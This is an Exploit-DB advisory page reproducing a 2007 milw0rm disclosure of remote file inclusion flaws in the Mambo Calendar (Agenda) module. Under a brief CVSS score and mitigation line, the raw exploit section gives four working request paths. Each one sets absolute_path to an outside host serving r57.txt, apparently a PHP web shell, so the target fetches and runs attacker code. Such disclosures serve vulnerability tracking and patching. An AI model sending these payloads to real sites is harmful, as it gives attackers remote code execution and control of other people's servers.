Mambo module Calendar (Agenda)

vendor:

by:

Cold z3ro

7.5

CVSS

HIGH

RFI (Remote File Inclusion)

CWE

Product Name:

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Mambo module Calendar (Agenda) <= 155 (com_calendar.php) Multiple RFI Vuln

The vulnerability allows an attacker to include a remote file from a vulnerable website, which can lead to arbitrary code execution.

Mitigation:

The vulnerability can be mitigated by validating and sanitizing user input before including files.

Source

Exploit-DB raw data:

==================================================================
Mambo module Calendar (Agenda) <= 155 (com_calendar.php) Multiple RFI Vuln
==================================================================
Found By : Cold z3ro , Cold-z3ro@hotmail.com
==================================================================
Homepage: www.Hack-Teach.com
==================================================================
Script :
http://www2.tutorial.hu/letoltes/dl.php?p=/scriptek/joomla/mambo.4.0.x/Calendar&i=agenda-155.zip
==================================================================
File : /com_calendar.php
include($absolute_path.'/components/calendar/cal_config.php');
==================================================================
/components/calendar/com_calendar.php?absolute_path=http://nachrichtenmann.de/r57.txt?
/modules/calendar/mod_calendar.php?absolute_path=http://nachrichtenmann.de/r57.txt?
Or
/components/com_calendar.php?absolute_path=http://nachrichtenmann.de/r57.txt?
/modules/mod_calendar.php?absolute_path=http://nachrichtenmann.de/r57.txt?
==================================================================


#Long Life Palestine
#www.Hack-Teach.com

# milw0rm.com [2007-04-11]